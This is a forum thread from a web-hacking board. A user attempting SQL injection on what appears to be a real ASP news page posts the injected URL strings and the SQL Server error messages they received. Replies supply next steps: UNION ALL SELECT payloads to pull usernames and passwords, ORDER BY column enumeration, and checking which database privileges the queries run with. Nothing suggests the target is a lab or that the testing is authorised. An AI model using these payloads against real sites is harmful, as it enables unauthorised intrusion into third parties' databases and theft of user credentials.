Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

mssql injections :-/

  1. Home
  2. Forum
  3. Web hacking
  4. mssql injections :-/

ghost's Avatar

ghost

0 0

For the past 2 hours I've been trying to exploit a page I found that I think is vulnerable to sql injection. After reading countless articles and pdf's I'm left confused.the url looks like this:

newfullstory.asp?ID=

when I put this query in the url:

newfullstory.asp?ID="or'='–

I get the following error:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'or=–' to a column of data type int.

/news/lani/newfullstory.asp, line 357

I read an article http://www.securiteam.com/securityreviews/5DP0N1P76E.html

and it said if you get that error and you put this query in the url:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

and this should output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table_name' to a column of data type int. /index.asp, line 5

but when I do it all I get is this:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '114124 SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-' to a column of data type int.

/news/lani/newfullstory.asp, line 357

So I'm out of ideas and I'm going to continue searching, but if anyone has any idea of what is going on and could reply, I'd appreciate it very much.

                                                              - A~hack

ghost's Avatar

ghost

0 0

For starters i believe the m$ dbase wants /* for comments instead of – (tho i could be wrong. give it a try tho)

it looks to me like you put 2 ' in that first example. try just puting 1 to close it then the OR portion.

2ndly this is a BLIND sql injection, which has different rules. so reading sql injection tuts will only semi help you. you cannot do a specific select for these you have to do a UNION ALL SELECT (all the fields) FROM table – example: UNION ALL SELECT username, password, uid FROM users – if those were it… you can find these by doing newfullstory.asp?ID=4 ORDER BY 1/* (or – if it is that) that should work if it does do newfullstory.asp?ID=4 ORDER BY2/* then 3, 4, 5, etc….till you throw an error

enjoy


ghost's Avatar

ghost

0 0

See if you can find what priveleges (or user) your running the sql queries under.